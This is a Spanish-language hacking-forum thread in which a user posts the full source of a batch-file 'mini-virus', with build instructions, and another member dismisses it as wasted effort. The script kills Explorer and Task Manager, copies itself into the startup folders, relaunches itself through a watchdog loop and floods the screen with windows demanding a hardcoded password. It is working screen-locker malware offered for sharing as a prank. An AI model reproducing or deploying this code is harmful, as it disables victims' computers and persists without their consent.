elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  ¿MiniVirus? en Batch
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿MiniVirus? en Batch  (Leído 631 veces)
Tino

Desconectado Desconectado

Mensajes: 26



Ver Perfil WWW
¿MiniVirus? en Batch
« en: 8 Marzo 2019, 02:14 am »

Hola foro!PRIMERO QUE NADA, quiero decir que esto no es como los típicos batch que eliminan la System32 y listo, porque primero, eso lo detecta hasta el antivirus más malo, y esto al ser algo ¿nuevo? no lo detecta. Y tampoco es un tipo de esas bromas con MSGBox, esto es algo que si se pudiera trabajar más en un lenguaje más avanzado (ya que se que en batch no se pueden hacer muchas cosas) podría llegar a ser algo muy poderoso.



El script lo podes encontrar en mi GitHub y acá abajo voy a dejar el SRC también.
De paso, si quieren cambiarle el nombre al archivo, necesitan hacer varias cosas.
Una de ellas es primero que nada cambiar todo lo que diga "MCRegedits.exe" a "NombreDeTuArchivo.exe", ya que no es algo automatizado (aunque si quieren puedo crear otro batch para automatizar esto.)
Además tienen que pasar su archivo a .EXE mediante Bat2Exe (creo que es la mejor opción)
De paso, al convertirlo a Bat2Exe (obligatorio, si no no funciona "CIF") hay algunos problemas, pero no importa.

Paso a explicar mi script.
El script lo que hace es:
Al iniciarlo primero que nada cierra explorer.exe y taskmgr.exe para que no se pueda abrir casi nada, crea los archivos: CIF y MOLESTO con nombres random
Código:
SET molestorndm=%RANDOM%XXXXMadeByTinoXXXX%RANDOM%HGJT4VY3%RANDOM%%RANDOM%5BBBS%RANDOM%FV%RANDOM%XX%RANDOM%XDFT%RANDOM%BT6432C%RANDOM%FAVV%RANDOM%fsos%RANDOM%34B34B%RANDOM%DAD%RANDOM%%RANDOM%FDDD%RANDOM%FFD%RANDOM%
Luego empieza a pedirles que inicien sesión con una contraseña de lo contrario no van a poder cerrar el programa.
Si lo cierran, esta "CIF" que checkea todo el tiempo si MCRegedits.exe está abierto y si no lo está, lo abre.
Crea cada 4 pings al localhost otra ventana CMD la cual empieza a molestar diciendo que inicie sesión, así que si está jugando a un juego en fullscreen etc, lo va a sacar, etc...
Si escriben la contraseña incorrecta, empiezan a abrirse más screens CMD de "MOLESTO".
Y lo más importante y es en lo que me centré es que si la persona que lo abre no entiende mucho o  no tiene ni idea donde se puede esconder el programa etc, no lo va a poder eliminar. La única forma es entrando en modo seguro y eliminando MCRegedits.exe en "shell:startup" y "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" o usando un script que también cree por las dudas de que sin querer como una persona que le faltan varios jugadores lo abra (mi caso) cree un "antidoto" que elimina la mayoría de los archivos y deja la computadora utilizable.
Si no me falta alguna otra cosa de poca importancia, ahí esta lo que hace un simple batch, sin eliminar nada, molestar.



Si van a compartirlo por favor, dejen créditos con un simple link a mi perfil o una mención, me haría feliz ya que esta ***** me saco tiempo de mi vida en lo cual podría haber gastado haciendo algo más importante, jeje. De paso, para algunos que digan que se puede encontrar en otros lados y que me copio de alguien o que si hay metodos de resolución en Google etc... Chupenme bien la pija esto está hecho todo a mano sin ningún programa (excepto Bat2Exe) y lo único que saqué de Google ya que no me acordaba fue esto:
Código:
tasklist /FI "IMAGENAME eq MCRegedits.exe" /FO CSV > mcregedits.lmao
FOR /F %%A IN (mcregedits.lmao) DO IF %%~zA EQU 0 GOTO end
la saque de Stackoverflow donde los gringuitos comparten su info.




Código:
echo off
cls
:: EMPIEZA LA MAGIA (SCRIPTS PARA PERSISTENCIA)
SET molestorndm=%RANDOM%XXXXMadeByTinoXXXX%RANDOM%HGJT4VY3%RANDOM%%RANDOM%5BBBS%RANDOM%FV%RANDOM%XX%RANDOM%XDFT%RANDOM%BT6432C%RANDOM%FAVV%RANDOM%fsos%RANDOM%34B34B%RANDOM%DAD%RANDOM%%RANDOM%FDDD%RANDOM%FFD%RANDOM%
echo off
cls
echo :s >> %temp%\mss.bat >> %molestorndm%.bat
echo echo echo off >> %temp%\mss.bat >> %molestorndm%.bat
echo echo cls >> %temp%\mss.bat
echo echo echo INICIA SESI¢N >> %temp%\mss.bat >> %molestorndm%.bat
echo echo title INICIA SESI¢N >> %temp%\mss.bat >> %molestorndm%.bat
echo echo ping localhost -n 2 >nul >> %temp%\mss.bat >> %molestorndm%.bat
echo echo exit >> %temp%\mss.bat >> %molestorndm%.bat
echo start %temp%\mss.bat >> %molestorndm%.bat
echo ping localhost -n 4 >nul >> %molestorndm%.bat
echo goto s >> %molestorndm%.bat
start /min %temp%\%molestorndm%.bat
::::::::::::::::::::::::::::::::
:: PERSISTANCE AFTER SHUTDOWN ::
::::::::::::::::::::::::::::::::
copy MCRegedits.exe %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
copy MCRegedits.exe C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
:::::::::
:: CIF ::
:::::::::
copy MCRegedits.exe %temp%
SET cifrandom=%random%MadeByTino%random%FF%random%FRV%random%ERVWZ%random%TYN%random%456VVV%random%ZZZEZ%random%VKJVEJJV%random%LDKIADI%random%DJDHE4H%random%3458347%random%73626%random%7235452%random%U345FCNC3%random%757HC32V23JVJ%random%U43VH23%random%
echo :cif >> %temp%\%cifrandom%.bat
echo taskkill /f /im "explorer.exe" >> %temp%\%cifrandom%.bat
echo taskkill /f /im "taskmgr.exe" >> %temp%\%cifrandom%.bat
echo echo off >> %temp%\%cifrandom%.bat
echo tasklist /FI "IMAGENAME eq MCRegedits.exe" /FO CSV > mcregedits.lmao >> %temp%\%cifrandom%.bat
echo FOR /F %%A IN (mcregedits.lmao) DO IF %%~zA EQU 0 GOTO end >> %temp%\%cifrandom%.bat
echo start MCRegedits.exe >> %temp%\%cifrandom%.bat
echo goto cif >> %temp%\%cifrandom%.bat
echo :end >> %temp%\%cifrandom%.bat
echo del mcregedits.lmao >> %temp%\%cifrandom%.bat
echo goto cif >> %temp%\%cifrandom%.bat
start /min %temp%\%cifrandom%.bat

:start
start /min %temp%\%cifrandom%.bat
start /min %temp%\%molestorndm%.bat
cls
color f0
echo ^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=
echo            Al parecer necesitas iniciar sesi¢n
echo             Usa la contrase¤a que te han dado.
echo.
echo         Si reinicias la PC o cierras el programa
echo                 va a aparecer de nuevo
echo                  Script made by Tino
echo ^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=^=
SET /P psw=Ingresa la contrase¤a:
IF %psw%==tino777 goto :done
) ELSE (
goto :nope

:done
cls
echo Contrase¤a correcta!
echo Felicidades.
cd %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
del MCRegedits.exe
cd %temp%
del MCRegedits.exe
cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
del MCRegedits.exe
taskkill /f /im "cmd.exe"
taskkill /f /im "MCRegedits.exe"
pause
exit

:nope
cls
echo Contrase¤a incorrecta!
echo Intentalo de nuevo
echo Mientras mas contrase¤as incorrectas, mas mensajes!
echo.
echo Presione cualquier tecla para volver al inicio
pause >nul
start %temp%\%molestorndm%.bat
goto :start
pause


En línea

Eleкtro
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.709



Ver Perfil
Re: ¿MiniVirus? en Batch
« Respuesta #1 en: 8 Marzo 2019, 06:48 am »

esta ***** me saco tiempo de mi vida en lo cual podría haber gastado haciendo algo más importante, jeje.

Tu mismo lo has dicho... pudiendo hacer algo más importante vas y haces esta cosa.

Sobre este tipo de scripts opino lo mismo que con respecto a los "antivirus batch", no son de utilidad. Y para no ser hipócrita confesaré que yo también hice algo relacionado en el año 2012...


pero, una vez aprendida la lección, ni loco volvería a perder mi tiempo haciendo algo de eso en Batch.

PD: gracias por compartir.

Saludos!


En línea


Tino

Desconectado Desconectado

Mensajes: 26



Ver Perfil WWW
Re: ¿MiniVirus? en Batch
« Respuesta #2 en: 8 Marzo 2019, 18:04 pm »

Jajaja, es una pérdida de tiempo, pero lo hice para joder a amigos que no entienden nada y no olvidarme de Batch que aunque sea malo, siempre está piola saber otro lenguaje :)
Lo publico acá por si alguien quiere perder el tiempo con algo de ese estilo.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines